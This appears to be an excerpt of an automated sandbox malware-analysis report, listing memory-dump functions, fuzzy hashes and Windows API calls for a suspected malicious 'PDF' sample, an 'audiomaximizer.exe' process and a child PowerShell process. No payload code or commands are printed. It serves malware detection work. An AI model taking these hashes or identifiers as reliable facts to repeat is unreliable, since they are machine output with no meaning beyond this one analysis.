Instruction Fuzzy Hash: 8C512570D01228CBDB04DFA9D4847EDBBB2FFA9308F24D529D424AB294DB759881CF64

Function 01D2F4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c853c50b046829d03d25de4acf9bc99395c47441c7a451741b3ec4cff8f4c38f
Instruction ID: fb588cae6626107a2e4e12e2bbd0f055087fc3a8b711be84dddade54970a11fe
Opcode Fuzzy Hash: c853c50b046829d03d25de4acf9bc99395c47441c7a451741b3ec4cff8f4c38f
Instruction Fuzzy Hash: 86511370D01228CBDB00DFA8D484BEDBBB2FF69308F249919D425AB294D775A881CF64

Function 05B60853 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7fcfded1a4ec0b9ec49e059069d3c4015522ab405a5e8968ac4544cadd6ddb6
Instruction ID: 733484cfa86f7a6eaf2aa3ca832f2c963da4a1961c2111369768499805aeae37
Opcode Fuzzy Hash: e7fcfded1a4ec0b9ec49e059069d3c4015522ab405a5e8968ac4544cadd6ddb6
Instruction Fuzzy Hash: BD519134A41229CFCB65DF24C854BAAB7B2FB49301F5099E9D50EA7350DB35AE81CF50

Function 01D26920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 01D2695E
\;^q, xrefs: 01D26952
\;^q, xrefs: 01D26936
\;^q, xrefs: 01D2692C

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: d8fb7edd2cf9cbe9332ed0ff5f4c430c79c50934970ebc0b06cbd91ea5ba9147
Instruction ID: 42a55a507ad373a9f5850c4b33587ff3ef97691549b8f0a70a10310d43ed9c75
Opcode Fuzzy Hash: d8fb7edd2cf9cbe9332ed0ff5f4c430c79c50934970ebc0b06cbd91ea5ba9147
Instruction Fuzzy Hash: 6401DF31B40324CFCB248E2CC5449A537EBAFACA68725446AE9A6CF3B5DE31DC818740

Analysis Process: audiomaximizer.exePID: 7404, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	86
Total number of Limit Nodes:	6

Executed Functions

Function 0176D3C9 Relevance: 6.1, APIs: 4, Instructions: 131
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0176D456
GetCurrentThread.KERNEL32 ref: 0176D493
GetCurrentProcess.KERNEL32 ref: 0176D4D0
GetCurrentThreadId.KERNEL32 ref: 0176D529

Memory Dump Source

Source File: 00000005.00000002.4131024328.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1760000_audiomaximizer.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f396558b796e0ce04f47e6413988ee3083ff22f09500be3d3517f59d6c9db1e6
Instruction ID: f683c8a0f752360c33693e18ba948545984e0861d62f2aced2bcc0f83746c381
Opcode Fuzzy Hash: f396558b796e0ce04f47e6413988ee3083ff22f09500be3d3517f59d6c9db1e6
Instruction Fuzzy Hash: DB5144B0A102498FDB14DFA9D548BDEBFF5BF48304F20846AE459A7360DB34A984CF65

Function 0176D3D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0176D456
GetCurrentThread.KERNEL32 ref: 0176D493
GetCurrentProcess.KERNEL32 ref: 0176D4D0
GetCurrentThreadId.KERNEL32 ref: 0176D529

Memory Dump Source

Source File: 00000005.00000002.4131024328.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1760000_audiomaximizer.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 11fe2b56995d8e046298f5821924bca5db4600abc210c7e0471747d0662c5c50
Instruction ID: 8e736ac262e9826087c08612c6fde1ec5edbbec10bbc7863065ce60cfed74a08
Opcode Fuzzy Hash: 11fe2b56995d8e046298f5821924bca5db4600abc210c7e0471747d0662c5c50
Instruction Fuzzy Hash: 6E5154B0A102098FDB14DFAAD548BDEFFF5BF48304F208469E459A7360DB34A984CB65

Function 0176AD48 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0176AF9E

Memory Dump Source

Source File: 00000005.00000002.4131024328.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1760000_audiomaximizer.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b1c39d201e3d4e5b65e7159eccebcced0900d2cf10bd2a5011774154378ce55f
Instruction ID: fde21664a666e9d63143843d9672d23b9c1318bcdccbec32d1825758aa20c78d
Opcode Fuzzy Hash: b1c39d201e3d4e5b65e7159eccebcced0900d2cf10bd2a5011774154378ce55f
Instruction Fuzzy Hash: FC714370A00B058FD724DF69C54575ABBF9FF88200F008A2DD98AE7B44DB75E846CB91

Function 01764248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 017659C9

Memory Dump Source

Source File: 00000005.00000002.4131024328.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1760000_audiomaximizer.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 07cb4bbddced5dfb5d00025bcf886b1d547748cab3719d16b174a38a6140d8e4
Instruction ID: 86b4fcc8d383c39ea81c93cb9923fb2a506a47dc314dc6b1edae5d3c72fef2b8
Opcode Fuzzy Hash: 07cb4bbddced5dfb5d00025bcf886b1d547748cab3719d16b174a38a6140d8e4
Instruction Fuzzy Hash: 0E41D0B1D0071DDFDB24CFA9C884A9DBBF9BF49304F2480AAD408AB255DB756945CF90

Function 0176590D Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 017659C9

Memory Dump Source

Source File: 00000005.00000002.4131024328.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1760000_audiomaximizer.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e4bf9a3265e8cab72d54619f03298175724a3417b5677bf03c0a707dcedc7bf4
Instruction ID: 5d9d78c04882d26823b114b28862f31074339ac35d8018f8d9d89bd6b58c56b2
Opcode Fuzzy Hash: e4bf9a3265e8cab72d54619f03298175724a3417b5677bf03c0a707dcedc7bf4
Instruction Fuzzy Hash: BB41E0B1D00719CFDB24CFA9C88478DBBF5BF49304F2480AAD418AB255DB756946CF90

Function 0176D620 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0176D6A7

Memory Dump Source

Source File: 00000005.00000002.4131024328.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1760000_audiomaximizer.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d791d7c4822b0fec7321b32c8b56f0b692b6c7399594fac0d887c59b72a3eaea
Instruction ID: 3761166dc5445fc0bb58ddfc8d805c83a297d4220ce5584afa7ab1bcbf553815
Opcode Fuzzy Hash: d791d7c4822b0fec7321b32c8b56f0b692b6c7399594fac0d887c59b72a3eaea
Instruction Fuzzy Hash: 8521E2B59002489FDB10CFAAD984ADEFFF8EB48320F14841AE958A7310D374A940CFA5

Function 0176D619 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0176D6A7

Memory Dump Source

Source File: 00000005.00000002.4131024328.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1760000_audiomaximizer.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ca2610b06dd981d15fb6ccaf7a8fcd74872fd64a1210c778897099b14a0c626f
Instruction ID: 1e320fef711c31246b23095a7273929a1a5b4ef05d2f3b43f33fabbf506a271f
Opcode Fuzzy Hash: ca2610b06dd981d15fb6ccaf7a8fcd74872fd64a1210c778897099b14a0c626f
Instruction Fuzzy Hash: B821E4B5900219DFDB10CF99D584AEEFBF4EB48314F14841AE958B7310D374A940CF65

Function 0176AF38 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0176AF9E

Memory Dump Source

Source File: 00000005.00000002.4131024328.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1760000_audiomaximizer.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ed14fcc09ce1facc0f211c1b8828945c576f7706834e35b36f4dcd027b62815c
Instruction ID: 816d97804e85172a5cfbdfb5604917f9dad3b8a365f91b2c2d66a307db388579
Opcode Fuzzy Hash: ed14fcc09ce1facc0f211c1b8828945c576f7706834e35b36f4dcd027b62815c
Instruction Fuzzy Hash: 7F1110B5C003498FDB10CF9AD444ADEFBF8AB88324F10842AD968B7250C379A545CFA5

Function 0168D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4130137751.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_168d000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05394e4f69fa4714a628c55a2414c772a1ff4a8b4bf0157e01b7c31f4b5a5167
Instruction ID: c6f0798584bc55ebdb9fcd61bee7ea69601a71e2d7949267d3d8f16f4eabef77
Opcode Fuzzy Hash: 05394e4f69fa4714a628c55a2414c772a1ff4a8b4bf0157e01b7c31f4b5a5167
Instruction Fuzzy Hash: 28210671500240DFDB05EF58D9C0F27BF65FB84318F20C66AD9054B296C336D456C6B2

Function 0169D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4130264361.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_169d000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db814c801b325754a19b885dc8b0ac89a20924464f05213f28853ef47f13ae46
Instruction ID: 42040218247c189165dbd63cc91efcc7c1d5b8561755fd0143b31e587246795d
Opcode Fuzzy Hash: db814c801b325754a19b885dc8b0ac89a20924464f05213f28853ef47f13ae46
Instruction Fuzzy Hash: 4F21D071604200DFDF15DF68D984B26BBA9EB84354F20C579D94A4B396C33AD447CA61

Function 0169D2BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4130264361.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_169d000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81eae3d96a9dc71ac27bf1e5e77c7e5c525902b01c41857aabe1b820b7787db3
Instruction ID: 88588e4030b11580dc91078d03504007f91a50f26c4ed441f6a460cddc1e886b
Opcode Fuzzy Hash: 81eae3d96a9dc71ac27bf1e5e77c7e5c525902b01c41857aabe1b820b7787db3
Instruction Fuzzy Hash: 5D213571504204DFDF01DF58DDC0B2ABBA9FB85325F24C679D9494B342C33AD446CAA1

Function 0169D006 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4130264361.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_169d000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b34452947167f32be14a4c58fc0e5cb5b1a4e59b41b260cdd178ac88361b5c48
Instruction ID: b3674776dd66ceb2a519abc3434d2991a038f86c7d0155c1ed5c5fa1c13d4dc1
Opcode Fuzzy Hash: b34452947167f32be14a4c58fc0e5cb5b1a4e59b41b260cdd178ac88361b5c48
Instruction Fuzzy Hash: B1219F755083809FDB02CF64D994B11BFB5FB46314F24C5EAD8498F2A7C33A980ACB62

Function 0168D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4130137751.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_168d000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 7c39f9d02efdfc9b08c86bafab707d263c3e51de72211900a3abaca7dd959bc9
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 5E11E172404280DFCB02DF54D9C4B16BF71FB84318F24C6AAD9090B656C336D45ACBB2

Function 0169D2B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4130264361.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_169d000_audiomaximizer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction ID: 990c5ad8ab2038f045f8e2a4f584fd4b3f3a9ad84d97366556408c7dfbcf0d81
Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
Instruction Fuzzy Hash: 8211BF76504680CFDB12CF14D9C4B1AFF61FB85324F28C6AAD8494B756C33AD40ACBA2

Analysis Process: powershell.exePID: 7432, Parent PID: 7404COMMON

Executed Functions

Function 07A71810 Relevance: 14.8, Strings: 11, Instructions: 1047COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07A720BF
4'^q, xrefs: 07A71B4E
4'^q, xrefs: 07A7224D
tP^q, xrefs: 07A720B3
4'^q, xrefs: 07A72241
4'^q, xrefs: 07A71CA8
4'^q, xrefs: 07A723F1
\, xrefs: 07A71BFC
4'^q, xrefs: 07A723FD
4'^q, xrefs: 07A71CB2
4'^q, xrefs: 07A71B58

Memory Dump Source

Source File: 00000006.00000002.1846238605.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$\$tP^q$tP^q
API String ID: 0-3960514012
Opcode ID: b9efffe7087c1db3a3c6cd6c74eaadfadd1470281ecb6619277d36c05d2e9fcc
Instruction ID: 6b122557fa1fea1476e0a893920bf737b9648bfae0d026776cb394979c1bf714
Opcode Fuzzy Hash: b9efffe7087c1db3a3c6cd6c74eaadfadd1470281ecb6619277d36c05d2e9fcc
Instruction Fuzzy Hash: 647259B1B042098FC7249B69DC0176ABBF6AFC6311F14C4BAD565CF296DA31C846C7A1

Function 07A717F4 Relevance: 1.4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

<, xrefs: 07A717F4

Memory Dump Source

Source File: 00000006.00000002.1846238605.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: 1b92837823756d50fde07037a8c0c3bfc564358c33a68af4d1b60522e860fc10
Instruction ID: 053ee6beccf1c28d4c3a18675f0f18f7510dd51ccde91da1f6f695c2a9dcd491
Opcode Fuzzy Hash: 1b92837823756d50fde07037a8c0c3bfc564358c33a68af4d1b60522e860fc10
Instruction Fuzzy Hash: 1F4119F1A0030A8FDB258F65CD01A6A7FF2AFC5355F0484AAE460DF256D735C846C7A2

Function 03216CDB Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1829358324.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4df568bf88c828b5b4081e7dfb43e4c508ac1fd40fea8bed6beb03f4b2e6c271
Instruction ID: a5122481785034b165d9366b3ed25bd39832435203e8c90a568fba09cf2283de
Opcode Fuzzy Hash: 4df568bf88c828b5b4081e7dfb43e4c508ac1fd40fea8bed6beb03f4b2e6c271
Instruction Fuzzy Hash: F3417134A14244DFCB05CF68D5909ADFBF2FF89310B1584A9E941AB366CB35EC55CB50

Function 03217680 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1829358324.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25580aa7d5b7810a253ad3936cc3fbb2738bb848b2e9753a9e8e9e524d52a0c0
Instruction ID: df140751079e0d8eec8fb794c496adab0bf0b03e259ade505e9211d4e42475b4
Opcode Fuzzy Hash: 25580aa7d5b7810a253ad3936cc3fbb2738bb848b2e9753a9e8e9e524d52a0c0
Instruction Fuzzy Hash: E9216B74A0425A8FCB05CF5CC9809AABBB4FF99300B1581AAD459DB352C735F851CBA1

Function 03217670 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1829358324.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bae394125aaefb8f6e79fb6ce4da0041e05f541cf49f543e62ff30e224f264ed
Instruction ID: e8b0b67c700cf117baf47eb3ca41f9b775869a848db8b0b0187b5820797df20e
Opcode Fuzzy Hash: bae394125aaefb8f6e79fb6ce4da0041e05f541cf49f543e62ff30e224f264ed
Instruction Fuzzy Hash: F22114B8E002498FCB00DF9CD5809AEBBF5FF89310B1585A9D849AB352C331EC51CBA1

Function 0319D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1828908861.000000000319D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0319D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_319d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc01b4aa6577da283892f3e64f6364b931104fe7479a8f674844e48a66dcde8d
Instruction ID: 380f405be8e83e5e87f2358f2b079d146fc81ea4a4502051b45c375c4beaceb4
Opcode Fuzzy Hash: cc01b4aa6577da283892f3e64f6364b931104fe7479a8f674844e48a66dcde8d
Instruction Fuzzy Hash: 0F01DF314083009BFB108A29ED84B67FF98EF49324F1DC56BEC080A246C7799881C6B2

Function 0319D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1828908861.000000000319D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0319D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_319d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4fef3f127981115d6c794025ff35ededdb1cf8f03475e3c3035c6d7fb651c0c
Instruction ID: e22aac2261a269753b9fcf433d911067825e22ef3b7fe0a1e01d2359ffb4d881
Opcode Fuzzy Hash: e4fef3f127981115d6c794025ff35ededdb1cf8f03475e3c3035c6d7fb651c0c
Instruction Fuzzy Hash: D8012D6240E3C09FE7128B259894B52BFB4EF47224F1D80DBD8888F1A3C2699845C772

Function 032191C2 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1829358324.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c62819baadaff1aac99d97c0759688b898e7cdf5ac9491bc7cbb5d060d1149bc
Instruction ID: fdd7d04a5b71752e71b7a141f6584881b7b22d9652fa19fefd3a2b944457581f
Opcode Fuzzy Hash: c62819baadaff1aac99d97c0759688b898e7cdf5ac9491bc7cbb5d060d1149bc
Instruction Fuzzy Hash: CFF06834E00105DFCB04CF9DC8549A9F7B5FF88210B248599D556A7711C7356C96CB91

Function 03212C06 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1829358324.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d64385fce36c50a49d435382e0965f8c2ebb523bf3a4094f8c7f06459b585026
Instruction ID: a903d1d5bf11c22f53d946e6bf226093a13183270bcec0bc144892043401d12a
Opcode Fuzzy Hash: d64385fce36c50a49d435382e0965f8c2ebb523bf3a4094f8c7f06459b585026
Instruction Fuzzy Hash: 31F0D435A001099FCB15CF9DD990AEEF7B1FF88324F248159E515A72A1C736AC62CB60

Non-executed Functions

Function 07A71450 Relevance: 10.3, Strings: 8, Instructions: 328COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07A714D9
4'^q, xrefs: 07A71651
$^q, xrefs: 07A71462
tP^q, xrefs: 07A714CD
$^q, xrefs: 07A71494
$^q, xrefs: 07A71736
4'^q, xrefs: 07A7165D
$^q, xrefs: 07A71488

Memory Dump Source

Source File: 00000006.00000002.1846238605.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
API String ID: 0-3865595929
Opcode ID: 5e7a44d890d55b376a6d4ff8834adecb14d1d72180d5e4d634ea6a824c6f6f2c
Instruction ID: 23b7c8f70bee0ce6da45e65f3b0bc733957c7a2289780f3e32e8b729ed27fd22
Opcode Fuzzy Hash: 5e7a44d890d55b376a6d4ff8834adecb14d1d72180d5e4d634ea6a824c6f6f2c
Instruction Fuzzy Hash: 83B128B27043498FC7259B6DDC04A66BBF5AFC6220F18846BD465CF3A2DA31CD45C7A2

Function 07A70550 Relevance: 9.1, Strings: 7, Instructions: 317COMMON

Download Yara Rule

Strings

$^q, xrefs: 07A70764
tP^q, xrefs: 07A7079D
4'^q, xrefs: 07A7065F
$^q, xrefs: 07A70758
tP^q, xrefs: 07A707A9
4'^q, xrefs: 07A70653
$^q, xrefs: 07A70732

Memory Dump Source

Source File: 00000006.00000002.1846238605.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-1608119003
Opcode ID: f9171e481d2ef73a11ab5c5a2d6cb35a8d3cf1100423d0d18b2f7f0731c6c919
Instruction ID: ad82a642333caf50d47640bd7c4515c268bc1f4ef426b74d224618d72556b5c1
Opcode Fuzzy Hash: f9171e481d2ef73a11ab5c5a2d6cb35a8d3cf1100423d0d18b2f7f0731c6c919
Instruction Fuzzy Hash: CAA178B27043158FC7258B799C1067BBBF1AFC6211F1884ABD465CF3A1DA71C845CBA2

Function 07A711A0 Relevance: 6.4, Strings: 5, Instructions: 186COMMON

Download Yara Rule

Strings

$^q, xrefs: 07A7135E
4'^q, xrefs: 07A71256
$^q, xrefs: 07A71352
4'^q, xrefs: 07A7124A
$^q, xrefs: 07A71327

Memory Dump Source

Source File: 00000006.00000002.1846238605.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 7e8f76571883b1ce01f020f375dc573935850ac7f500c2e046cb293e9c31666f
Instruction ID: 4870e75ec5ac260d14870f83f9a07d98a1c842a27f2954e345780812ac384c4b
Opcode Fuzzy Hash: 7e8f76571883b1ce01f020f375dc573935850ac7f500c2e046cb293e9c31666f
Instruction Fuzzy Hash: 0D5137B1B0430EDFCB285BA9CC0066ABBF6AFC6611F24847AD465CB751DA31C885C7A1

Function 07A732B0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 07A73318
$^q, xrefs: 07A732DE
$^q, xrefs: 07A732C2
$^q, xrefs: 07A7330C

Memory Dump Source

Source File: 00000006.00000002.1846238605.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 067efb9763221260de82cb1bbdef98642c65cd497f709e373ccbcd68122bc1ae
Instruction ID: efe5b98b38f39f4158df4beafaedbac9c3a2e6681033fabe3d50c82eaadb8358
Opcode Fuzzy Hash: 067efb9763221260de82cb1bbdef98642c65cd497f709e373ccbcd68122bc1ae
Instruction Fuzzy Hash: BB2179B17003969BDF3C47AA4C00B27B6EA9BC0715F21842AE525CF381CD36C841D361

Function 07A71430 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

H, xrefs: 07A71430
$^q, xrefs: 07A71462
tP^q, xrefs: 07A714CD
$^q, xrefs: 07A71488

Memory Dump Source

Source File: 00000006.00000002.1846238605.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID: H$tP^q$$^q$$^q
API String ID: 0-2033775723
Opcode ID: e349ba68251661857e8304b3d4af264e6438ab25fb77ce794163dcd807c5c3a8
Instruction ID: e3082c8cc372426c2cce5deb9e56be61e79d30e541d5e6f6fabf15a8d0690632
Opcode Fuzzy Hash: e349ba68251661857e8304b3d4af264e6438ab25fb77ce794163dcd807c5c3a8
Instruction Fuzzy Hash: 072136F26043489FC7258F64CC04A66BBF0AFC6660F1A8096E464CF262D734CC44C761

Function 07A70308 Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

$^q, xrefs: 07A70352
$^q, xrefs: 07A7035E
4'^q, xrefs: 07A70373
4'^q, xrefs: 07A7037F

Memory Dump Source

Source File: 00000006.00000002.1846238605.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 689390bb1144f3306f8750226c9780904aa6024cd0a20282ef9dd02b3ee34109
Instruction ID: 5c9bea120a624601a3175b1f260c31d3afee29fa8ef1c010b01cada12a64d3a4
Opcode Fuzzy Hash: 689390bb1144f3306f8750226c9780904aa6024cd0a20282ef9dd02b3ee34109
